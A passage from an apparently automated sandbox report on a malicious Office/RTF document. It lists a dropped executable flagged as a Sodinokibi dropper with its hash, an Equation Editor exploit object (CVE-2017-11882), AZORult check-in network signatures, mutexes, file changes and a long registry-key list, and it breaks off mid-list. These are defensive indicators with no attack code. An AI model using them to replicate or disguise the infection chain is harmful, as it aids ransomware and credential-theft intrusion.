  754. "dropped": "clamav:Win.Dropper.Sodinokibi-7052937-0, sha256:3195943681220ae13190e79c117b45bdef28ad33e37246a6f5f05ddc7c21b47d, guest_paths:C:\\Users\\user\\AppData\\Roaming\\oko.exe*C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\S4VH3RFR\\oko1.exe, type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed"
  755.  
  756.  
  757.  
  758.  
  759. "Description": "Drops a binary and executes it",
  760. "Details":
  761.  
  762. "binary": "C:\\Users\\user\\AppData\\Roaming\\oko.exe"
  763.  
  764.  
  765.  
  766.  
  767. "Description": "The RTF file contains an object with potential exploit code",
  768. "Details":
  769.  
  770. "cve": "Object 2 index 00000032h contains Microsoft Equation 3.0 (Known Related to CVE-2017-11882 or CVE-2018-0802)"
  771.  
  772.  
  773.  
  774.  
  775. "Description": "Collects information to fingerprint the system",
  776. "Details":
  777.  
  778.  
  779. "Description": "Created network traffic indicative of malicious activity",
  780. "Details":
  781.  
  782. "signature": "SURICATA TLS invalid record type"
  783.  
  784.  
  785. "signature": "ET TROJAN AZORult Variant.4 Checkin M2"
  786.  
  787.  
  788. "signature": "SURICATA TLS invalid record/traffic"
  789.  
  790.  
  791.  
  792.  
  793.  
  794. * Started Service:
  795. "osppsvc"
  796.  
  797.  
  798. * Mutexes:
  799. "Local\\2BF388D5-6F8C-40A0-A7EE-996D005C4E14_Office15",
  800. "Global\\MTX_MSO_Formal1_S-1-5-21-0000000000-0000000000-0000000000-1000",
  801. "Global\\MTX_MSO_AdHoc1_S-1-5-21-0000000000-0000000000-0000000000-1000",
  802. "5CAC3FAB-87F0-4750-984D-D50144543427-VER15",
  803. "CicLoadWinStaWinSta0",
  804. "Local\\MSCTF.CtfMonitorInstMutexDefault1",
  805. "Global\\MsoShellExtRegAccess_S-1-5-21-0000000000-0000000000-0000000000-1000",
  806. "Global\\552FFA80-3393-423d-8671-7BA046BB5906",
  807. "Local\\F99C425F-9135-43ed-BD7D-396DE488DC53",
  808. "A81FB8C6-0BBE6E18-6FC9B5DB-536DA455-933946726",
  809. "Global\\ADAP_WMI_ENTRY",
  810. "Global\\RefreshRA_Mutex",
  811. "Global\\RefreshRA_Mutex_Lib",
  812. "Global\\RefreshRA_Mutex_Flag"
  813.  
  814.  
  815. * Modified Files:
  816. "C:\\Users\\user\\AppData\\Local\\Temp\\wbBQQr0dX.doc",
  817. "C:\\Users\\user\\AppData\\Local\\Temp\\~$BQQr0dX.doc",
  818. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.Word\\~WRF379A4C55-77D3-47D1-8EFF-C1EC7619AA99.tmp",
  819. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Office\\15.0\\WebServiceCache\\AllUsers\\office15client.microsoft.com\\config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4569&crev=10",
  820. "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4",
  821. "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4",
  822. "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\37D958F0157C4E87D39A5E7FAB3AECCC_090773D7F9DBE1D85BCB60985361F32E",
  823. "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\37D958F0157C4E87D39A5E7FAB3AECCC_090773D7F9DBE1D85BCB60985361F32E",
  824. "C:\\Users\\user\\AppData\\Local\\Temp\\Cab706.tmp",
  825. "C:\\Users\\user\\AppData\\Local\\Temp\\Tar707.tmp",
  826. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.Word\\~WRSA5E5E720-84A6-465B-892E-59F5D4CE91B5.tmp",
  827. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Word\\AutoRecovery save of wbBQQr0dX.asd",
  828. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Word\\~WRD0000.tmp",
  829. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Word\\~WRL0001.tmp",
  830. "C:\\Users\\user\\AppData\\Local\\Temp\\~DF63EED31D1354659C.TMP",
  831. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC",
  832. "C:\\Users\\user\\AppData\\Local\\Temp\\cab5826.tmp",
  833. "C:\\Users\\user\\AppData\\Local\\Temp\\cab5827.tmp",
  834. "C:\\Users\\user\\AppData\\Local\\Temp\\cab5960.tmp",
  835. "C:\\Users\\user\\AppData\\Local\\Temp\\cab5DC6.tmp",
  836. "C:\\Users\\user\\AppData\\Local\\Temp\\cab5DC8.tmp",
  837. "C:\\Users\\user\\AppData\\Local\\Temp\\cab5DD9.tmp",
  838. "C:\\Users\\user\\AppData\\Local\\Temp\\cab5DEB.tmp",
  839. "C:\\Users\\user\\AppData\\Local\\Temp\\cab5DEC.tmp",
  840. "C:\\Users\\user\\AppData\\Local\\Temp\\cab5DDA.tmp",
  841. "C:\\Users\\user\\AppData\\Local\\Temp\\cab5E0C.tmp",
  842. "C:\\Users\\user\\AppData\\Local\\Temp\\cab5DC7.tmp",
  843. "C:\\Users\\user\\AppData\\Local\\Temp\\cab5ED9.tmp",
  844. "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4",
  845. "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4",
  846. "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_862BA1770B2FEE013603D2FF9ABEAFDA",
  847. "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_862BA1770B2FEE013603D2FF9ABEAFDA",
  848. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\S4VH3RFR\\oko1.exe",
  849. "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM"
  850.  
  851.  
  852. * Deleted Files:
  853. "C:\\Users\\user\\AppData\\Local\\Temp\\Cab706.tmp",
  854. "C:\\Users\\user\\AppData\\Local\\Temp\\Tar707.tmp",
  855. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Schemas\\MS Word_restart.xml",
  856. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\",
  857. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Word\\AutoRecovery save of wbBQQr0dX.asd",
  858. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Word\\~WRD0000.tmp",
  859. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Word\\~WRL0001.tmp"
  860.  
  861.  
  862. * Modified Registry Keys:
  863. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\StartupItems\\9q*",
  864. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\LanguageList",
  865. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Internet\\WebServiceCache",
  866. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Internet\\WebServiceCache\\RemoteClearDate",
  867. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Internet\\WebServiceCache\\AllUsers\\office15client.microsoft.com\\config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4569&crev=1",
  868. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Internet\\WebServiceCache\\AllUsers\\office15client.microsoft.com\\config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4569&crev=1\\Last",
  869. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Internet\\WebServiceCache\\AllUsers\\office15client.microsoft.com\\config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4569&crev=1\\0",
  870. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Internet\\WebServiceCache\\AllUsers\\office15client.microsoft.com\\config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4569&crev=1\\0\\FilePath",
  871. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Internet\\WebServiceCache\\AllUsers\\office15client.microsoft.com\\config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4569&crev=1\\0\\StartDate",
  872. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Internet\\WebServiceCache\\AllUsers\\office15client.microsoft.com\\config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4569&crev=1\\0\\EndDate",
  873. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Internet\\WebServiceCache\\AllUsers\\office15client.microsoft.com\\config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4569&crev=1\\0\\Properties",
  874. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Internet\\WebServiceCache\\AllUsers\\office15client.microsoft.com\\config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4569&crev=1\\0\\Url",
  875. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Internet\\WebServiceCache\\LastClean",
  876. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Roaming\\RoamingConfigurableSettings",
  877. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Roaming\\RoamingLastSyncTime",
  878. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Roaming\\RoamingLastWriteTime",
  879. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ReviewCycle",
  880. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ReviewCycle\\ReviewToken",
  881. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\CacheReady",
  882. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\LastRequest",
  883. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\DocumentRecovery",
  884. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\DocumentRecovery\\122462C",
  885. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\DocumentRecovery\\122462C\\122462C",
  886. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\00005119110000000000000000F01FEC\\Usage\\OUTLOOKFiles",
  887. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\Common\\Cloud Storage",
  888. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ForceCacheRefresh",
  889. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OnceSucceeded",
  890. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\LastUpdate",
  891. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\NextUpdate",
  892. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT",
  893. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Capabilities",
  894. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\ConnectMechanism",
  895. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\IsManaged",
  896. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\IsRemovable",
  897. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\ServiceOwner",
  898. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\SortOrder",
  899. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\SupportsMultiple",
  900. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\CapabilitiesMetadata",
  901. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Description",
  902. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Name",
  903. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\ServiceId",
  904. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\ServiceUrl",
  905. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Metadata",
  906. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Metadata\\KeyTip",
  907. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Metadata\\Type",
  908. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Thumbnails",
  909. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Thumbnails\\Url16x16",
  910. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Thumbnails\\Url32x32",
  911. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Thumbnails\\Url48x48",
  912. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP",
  913. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Capabilities",
  914. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\ConnectMechanism",
  915. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\IsManaged",
  916. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\IsRemovable",
  917. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\ServiceOwner",
  918. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\SortOrder",
  919. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\SupportsMultiple",
  920. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\CapabilitiesMetadata",
  921. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Description",
  922. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Name",
  923. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\ServiceId",
  924. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\ServiceUrl",
  925. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Metadata",
  926. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Metadata\\KeyTip",
  927. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Metadata\\Type",
  928. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Thumbnails",
  929. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Thumbnails\\Url16x16",
  930. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Thumbnails\\Url32x32",
  931. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Thumbnails\\Url48x48",
  932. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT",
  933. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Capabilities",
  934. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\ConnectMechanism",
  935. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\IsManaged",
  936. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\IsRemovable",
  937. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\ServiceOwner",
  938. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\SortOrder",
  939. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\SupportsMultiple",
  940. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\CapabilitiesMetadata",
  941. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Description",
  942. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Name",
  943. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\ServiceId",
  944. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\ServiceUrl",
  945. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Metadata",
  946. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Metadata\\KeyTip",
  947. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Metadata\\Type",
  948. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Thumbnails",
  949. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Thumbnails\\Url16x16",
  950. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Thumbnails\\Url32x32",
  951. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Thumbnails\\Url48x48",
  952. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP",
  953. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Capabilities",
  954. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\ConnectMechanism",
  955. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\IsManaged",
  956. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\IsRemovable",
  957. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\ServiceOwner",
  958. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\SortOrder",
  959. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\SupportsMultiple",
  960. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\CapabilitiesMetadata",
  961. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Description",
  962. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Name",
  963. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\ServiceId",
  964. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\ServiceUrl",
  965. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Metadata",
  966. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Metadata\\KeyTip",
  967. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Metadata\\Type",
  968. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Thumbnails",
  969. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Thumbnails\\Url16x16",
  970. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Thumbnails\\Url32x32",
  971. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Thumbnails\\Url48x48",
  972. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED",
  973. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\Capabilities",
  974. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\ConnectMechanism",
  975. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\IsManaged",
  976. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\IsRemovable",
  977. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\ServiceOwner",
  978. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\SortOrder",
  979. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\SupportsMultiple",
  980. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\CapabilitiesMetadata",
  981. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\Description",
  982. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\Name",
  983. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\ServiceId",
  984. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\ServiceUrl",
  985. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\Metadata",
  986. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\Metadata\\KeyTip",
  987. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\Metadata\\Type",
  988. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT",
